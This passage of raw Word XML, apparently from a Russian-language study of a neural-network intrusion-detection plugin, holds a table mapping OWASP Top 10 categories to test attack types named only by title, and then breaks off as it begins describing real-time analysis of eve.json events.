                <w:highlight w:val="yellow"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4961" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40149442" w14:textId="79A03E5C" w:rsidR="000A1CD6" w:rsidRPr="00A7269E" w:rsidRDefault="000A1CD6" w:rsidP="000A1CD6">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3367" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="708886FC" w14:textId="77777777" w:rsidR="000A1CD6" w:rsidRPr="00DA46A4" w:rsidRDefault="000A1CD6" w:rsidP="00AB6434">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 xml:space="preserve">HTTP </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DA46A4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Fuzzing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00DA46A4" w14:paraId="1EFBF83E" w14:textId="77777777" w:rsidTr="000A1CD6">
        <w:trPr>
          <w:trHeight w:val="443"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1448" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21C35181" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00DA46A4" w:rsidRDefault="008E0171" w:rsidP="000A1CD6">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А04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4961" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D1A8A8B" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00DA46A4" w:rsidRDefault="008E0171" w:rsidP="000A1CD6">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Небезопасный дизайн</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3367" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E41D7AD" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00DA46A4" w:rsidRDefault="008E0171" w:rsidP="00AB6434">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Загрузка вредоносного файла</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00DA46A4" w14:paraId="1CE29975" w14:textId="77777777" w:rsidTr="000A1CD6">
        <w:trPr>
          <w:trHeight w:val="565"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1448" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="436F27AF" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00DA46A4" w:rsidRDefault="008E0171" w:rsidP="000A1CD6">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A05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4961" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A523127" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00DA46A4" w:rsidRDefault="008E0171" w:rsidP="000A1CD6">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Неправильная настройка безопасности</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3367" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E347112" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00DA46A4" w:rsidRDefault="008E0171" w:rsidP="00AB6434">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Сетевая разведка</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00DA46A4" w14:paraId="5C4A6542" w14:textId="77777777" w:rsidTr="000A1CD6">
        <w:trPr>
          <w:trHeight w:val="616"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1448" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C25CFC8" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00DA46A4" w:rsidRDefault="008E0171" w:rsidP="000A1CD6">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A05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4961" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11A100EE" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00DA46A4" w:rsidRDefault="008E0171" w:rsidP="000A1CD6">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Неправильная настройка безопасности</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3367" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68AD52B2" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00DA46A4" w:rsidRDefault="008E0171" w:rsidP="00AB6434">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Перебор директорий</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00DA46A4" w14:paraId="740CF839" w14:textId="77777777" w:rsidTr="000A1CD6">
        <w:trPr>
          <w:trHeight w:val="526"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1448" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D1B72B7" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00DA46A4" w:rsidRDefault="008E0171" w:rsidP="000A1CD6">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A05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4961" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="110C92E0" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00DA46A4" w:rsidRDefault="008E0171" w:rsidP="000A1CD6">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Неправильная настройка безопасности</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3367" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A6B5E4A" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00DA46A4" w:rsidRDefault="008E0171" w:rsidP="00AB6434">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SYN-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DA46A4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>flood</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00DA46A4" w14:paraId="13584D72" w14:textId="77777777" w:rsidTr="000A1CD6">
        <w:trPr>
          <w:trHeight w:val="578"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1448" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="309B9D84" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00DA46A4" w:rsidRDefault="008E0171" w:rsidP="000A1CD6">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A05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4961" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CF69FB4" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00DA46A4" w:rsidRDefault="008E0171" w:rsidP="000A1CD6">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Неправильная настройка безопасности</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3367" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C59928E" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00DA46A4" w:rsidRDefault="008E0171" w:rsidP="00AB6434">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 xml:space="preserve">Медленный </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DA46A4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>DoS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00DA46A4" w14:paraId="0572DF6B" w14:textId="77777777" w:rsidTr="000A1CD6">
        <w:trPr>
          <w:trHeight w:val="368"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1448" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D9FCBA2" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00DA46A4" w:rsidRDefault="008E0171" w:rsidP="000A1CD6">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A05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4961" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3653C8B0" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00DA46A4" w:rsidRDefault="008E0171" w:rsidP="000A1CD6">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Неправильная настройка безопасности</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3367" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4746E2AD" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00DA46A4" w:rsidRDefault="008E0171" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00391162">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Извлечение</w:t>
            </w:r>
            <w:r w:rsidRPr="001D324E">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> данных</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00DA46A4" w14:paraId="48D6411D" w14:textId="77777777" w:rsidTr="000A1CD6">
        <w:trPr>
          <w:trHeight w:val="443"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1448" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22F1B3CF" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00DA46A4" w:rsidRDefault="008E0171" w:rsidP="000A1CD6">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А06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4961" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D8BDEEC" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00DA46A4" w:rsidRDefault="008E0171" w:rsidP="000A1CD6">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Сканирование уязвимых компонентов</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3367" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69F3CB97" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00DA46A4" w:rsidRDefault="008E0171" w:rsidP="00AB6434">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Скан веб сервера</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00DA46A4" w14:paraId="17E3508D" w14:textId="77777777" w:rsidTr="000A1CD6">
        <w:trPr>
          <w:trHeight w:val="399"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1448" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E8CC688" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00DA46A4" w:rsidRDefault="008E0171" w:rsidP="000A1CD6">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A07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4961" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59A936CE" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00DA46A4" w:rsidRDefault="008E0171" w:rsidP="000A1CD6">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Ошибки аутентификации</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3367" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BA87026" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00DA46A4" w:rsidRDefault="008E0171" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DA46A4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Брутфорс</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00DA46A4" w14:paraId="06421B5C" w14:textId="77777777" w:rsidTr="000A1CD6">
        <w:trPr>
          <w:trHeight w:val="414"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1448" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0695F689" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00DA46A4" w:rsidRDefault="008E0171" w:rsidP="000A1CD6">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A09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4961" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="421F99EB" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00DA46A4" w:rsidRDefault="008E0171" w:rsidP="000A1CD6">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Регистрация ошибок</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3367" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5160B665" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00DA46A4" w:rsidRDefault="008E0171" w:rsidP="00AB6434">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Журналирование событий</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00DA46A4" w14:paraId="72E1F0C9" w14:textId="77777777" w:rsidTr="000A1CD6">
        <w:trPr>
          <w:trHeight w:val="707"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1448" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="312043A8" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00DA46A4" w:rsidRDefault="008E0171" w:rsidP="000A1CD6">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>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А10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4961" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DD05674" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00DA46A4" w:rsidRDefault="008E0171" w:rsidP="000A1CD6">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Подделка запроса на стороне сервера</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3367" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C91727C" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00DA46A4" w:rsidRDefault="008E0171" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DA46A4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Вынудить сервер обратиться к IP атакующего</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="60DF4508" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00086FB2" w:rsidRDefault="008E0171" w:rsidP="002A245A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7068210A"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DA46A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Нейросетевой плагин работал в режиме слежения в реальном времени, непрерывно анализируя поступающие события из файла </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DA46A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>eve.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DA46A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
